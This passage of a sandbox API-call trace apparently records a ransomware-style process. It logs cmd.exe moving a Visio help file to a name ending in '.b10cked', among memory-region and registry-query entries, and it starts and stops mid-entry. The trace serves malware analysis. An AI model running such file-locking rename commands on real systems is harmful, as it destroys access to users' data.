(normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29871 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 29872 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 29873 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 29874 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 29875 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 29876 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 29877 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 29981 start_va = 0x12d0000 end_va = 0x138ffff entry_point = 0x12d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 676 os_tid = 0xd4c [0202.368] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fb44 | out: lpSystemTimeAsFileTime=0x12fb44*(dwLowDateTime=0xad6dcd20, dwHighDateTime=0x1d440a9)) [0202.368] GetCurrentProcessId () returned 0xd90 [0202.368] GetCurrentThreadId () returned 0xd4c [0202.368] GetTickCount () returned 0x391d3 [0202.368] QueryPerformanceCounter (in: lpPerformanceCount=0x12fb3c | out: lpPerformanceCount=0x12fb3c*=25915729717) returned 1 [0202.369] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.369] __set_app_type (_Type=0x1) [0202.369] __p__fmode () returned 0x76b331f4 [0202.369] __p__commode () returned 0x76b331fc [0202.369] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.369] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.369] GetCurrentThreadId () returned 0xd4c [0202.369] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd4c) returned 0x38 [0202.369] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.369] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.369] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.369] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.369] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fad4 | out: phkResult=0x12fad4*=0x0) returned 0x2 [0202.369] VirtualQuery (in: lpAddress=0x12fb0b, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.369] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.369] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.369] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.370] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.370] GetConsoleOutputCP () returned 0x1b5 [0202.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.370] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.370] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.370] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.371] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.371] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.371] GetEnvironmentStringsW () returned 0x1a01a0* [0202.371] FreeEnvironmentStringsW (penv=0x1a01a0) returned 1 [0202.371] GetEnvironmentStringsW () returned 0x1a01a0* [0202.371] FreeEnvironmentStringsW (penv=0x1a01a0) returned 1 [0202.371] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea44 | out: phkResult=0x12ea44*=0x40) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0xc8, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x1, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x1, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x0, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x40, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x40, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x40, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.371] RegCloseKey (hKey=0x40) returned 0x0 [0202.371] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea44 | out: phkResult=0x12ea44*=0x40) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x40, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x1, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x1, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x0, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x9, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x9, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x9, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.372] RegCloseKey (hKey=0x40) returned 0x0 [0202.372] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.372] srand (_Seed=0x5b8863a4) [0202.372] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"" [0202.372] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"" [0202.372] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.372] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a1900, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.372] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.372] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.372] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.372] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.372] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.372] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.373] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.373] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.373] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.373] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.373] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.373] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.373] GetEnvironmentStringsW () returned 0x1a22f0* [0202.373] FreeEnvironmentStringsW (penv=0x1a22f0) returned 1 [0202.373] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.373] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.373] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.373] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.373] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.373] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.373] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.373] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.373] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.373] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.373] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f810 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.373] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f810, lpFilePart=0x12f80c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f80c*="Desktop") returned 0x18 [0202.373] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.373] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f58c | out: lpFindFileData=0x12f58c) returned 0x1a0030 [0202.373] FindClose (in: hFindFile=0x1a0030 | out: hFindFile=0x1a0030) returned 1 [0202.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f58c | out: lpFindFileData=0x12f58c) returned 0x1a0030 [0202.374] FindClose (in: hFindFile=0x1a0030 | out: hFindFile=0x1a0030) returned 1 [0202.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f58c | out: lpFindFileData=0x12f58c) returned 0x1a0030 [0202.374] FindClose (in: hFindFile=0x1a0030 | out: hFindFile=0x1a0030) returned 1 [0202.374] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.374] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.374] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.374] GetEnvironmentStringsW () returned 0x1a2b10* [0202.374] FreeEnvironmentStringsW (penv=0x1a2b10) returned 1 [0202.374] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.375] GetConsoleOutputCP () returned 0x1b5 [0202.375] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.375] GetUserDefaultLCID () returned 0x409 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f950, cchData=128 | out: lpLCData="0") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f950, cchData=128 | out: lpLCData="0") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f950, cchData=128 | out: lpLCData="1") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.375] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.376] GetConsoleTitleW (in: lpConsoleTitle=0x1908f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.376] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.376] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.376] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.377] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.377] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.377] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.377] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.377] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.377] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.377] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.377] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.380] GetConsoleTitleW (in: lpConsoleTitle=0x12f648, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.380] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.380] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.380] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.380] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.380] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.380] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.380] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.380] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.380] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.380] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.380] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.380] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.380] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.380] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.380] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.380] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.381] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.381] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.381] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.381] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.381] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.381] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.381] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.381] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.381] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.381] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.381] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.381] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.381] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.381] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.381] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.381] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.381] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.381] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.381] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.382] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.382] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.382] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f404, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f3fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f3fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.384] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.384] _wcsicmp (_String1="MSVISI~4.HXN", _String2=".") returned 63 [0202.384] _wcsicmp (_String1="MSVISI~4.HXN", _String2="..") returned 63 [0202.384] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~4.hxn")) returned 0x2022 [0202.384] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1a1e70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.384] SetErrorMode (uMode=0x0) returned 0x0 [0202.384] SetErrorMode (uMode=0x1) returned 0x0 [0202.384] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", nBufferLength=0x104, lpBuffer=0x12ed8c, lpFilePart=0x12ed74 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", lpFilePart=0x12ed74*="MSVISI~4.HXN") returned 0x27 [0202.384] SetErrorMode (uMode=0x0) returned 0x1 [0202.384] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.384] _wcsicmp (_String1="MSVISI~4.HXN", _String2=".") returned 63 [0202.384] _wcsicmp (_String1="MSVISI~4.HXN", _String2="..") returned 63 [0202.384] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~4.hxn")) returned 0x2022 [0202.384] SetErrorMode (uMode=0x0) returned 0x0 [0202.384] SetErrorMode (uMode=0x1) returned 0x0 [0202.384] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", nBufferLength=0x104, lpBuffer=0x12f208, lpFilePart=0x12efa0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", lpFilePart=0x12efa0*="MSVISI~4.HXN") returned 0x27 [0202.384] SetErrorMode (uMode=0x0) returned 0x1 [0202.385] SetErrorMode (uMode=0x0) returned 0x0 [0202.385] SetErrorMode (uMode=0x1) returned 0x0 [0202.385] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f410, lpFilePart=0x12efa0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked", lpFilePart=0x12efa0*="MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked") returned 0x42 [0202.385] SetErrorMode (uMode=0x0) returned 0x1 [0202.385] SetLastError (dwErrCode=0x0) [0202.385] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.visio.shapesheet.14.1033.hxn.b10cked")) returned 0xffffffff [0202.385] GetLastError () returned 0x2 [0202.385] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", 